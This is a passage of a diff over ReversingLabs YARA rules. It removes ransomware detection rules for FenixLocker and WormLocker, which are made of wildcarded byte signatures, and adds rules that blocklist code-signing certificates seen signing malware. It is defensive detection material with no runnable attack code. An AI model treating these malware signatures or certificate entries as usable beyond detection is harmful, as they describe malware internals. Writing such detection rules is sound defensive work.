-            ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D
-            55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51
-            ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_rsrc ) and ( all of ( $search_files_p* ) ) and ( all of ( $create_test_file_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Genezis" and ( pe.signatures [ i ] . serial == "00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures [ i ] . serial == "c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" ) and 1615161600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Fenixlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FenixLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4868ced4-885d-548c-993c-ae25ab188172"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FenixLocker.yara#L1-L143"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11576-L11592"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "72712616df2c73c5c17696a7c5cb93f767910acf5f49cda27373fccfa29c5a4d"
+		logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FenixLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B F1 E8 ?? ?? ?? ?? 83 C4
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B F8
-            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 72 ?? 8B 36 FF B5 ?? ?? ?? ?? 56 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 57 6A ?? 6A ?? 6A ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C3 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 01 8B C7 8B 4D ?? 5F 33 CD 5E E8 ??
-            ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_2 = {
-            B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75
-            ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 8D 55 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B F8 C6 45 ?? ?? 8B 4D ?? 8B 55 ?? 41 3B D1 77 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 4D ?? 4A 8B 45 ?? 23 CA 03 C1 89 4D ?? 8B 4D ?? 23 D0 83 3C 91 ?? 8D 34 95 ??
-            ?? ?? ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 89 04 31 8B 4D ?? 8B 0C 31 85
-            C9 74 ?? 57 E8 ?? ?? ?? ?? FF 45 ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40
-            3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B
-            C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83
-            C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ??
-            ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F
-            87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ??
-            ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ??
-            0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
-            ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ??
-            72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F
-            83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? 8B C2 83 C8 ?? 83 79 ??
-            ?? 0F 45 C2 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ??
-            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_3 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ??
-            72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F
-            82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F
-            84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ??
-            83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D
-            45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            46 EB ?? 85 F6 75 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 45 F0 89 B5 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 40 3D ?? ?? ??
-            ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B
-            C8 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_4 = {
-            8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 85 F6 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72
-            ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 40 ??
-            F6 84 05 ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D
-            41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50
-        }
-		$encrypt_files_5 = {
-            FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C3 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF
-            B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 4D ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 7E ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 4D ?? 83 7D ?? ?? 51 0F 43 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 46 89 B5 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ??
-            40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ??
-            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2a15d527-7f42-5c56-9740-9c2503a66f4f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11594-L11610"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $encrypt_files_1 and $encrypt_files_2 and $encrypt_files_3 ) or ( $encrypt_files_1 and $encrypt_files_4 and $encrypt_files_5 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WormLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11612-L11630"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9"
+		logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WormLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$set_environment = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ??
-            ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ??
-            ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ??
-            ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11
-            ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04
-            13 ?? 11 ?? 2D ?? 2A
-        }
-		$encrypt_files_p1 = {
-            00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73
-            ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16
-            02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ??
-            ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08
-            2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A
-        }
-		$encrypt_files_p2 = {
-            00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and ( pe.signatures [ i ] . serial == "00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" ) and 1673395200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11632-L11648"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
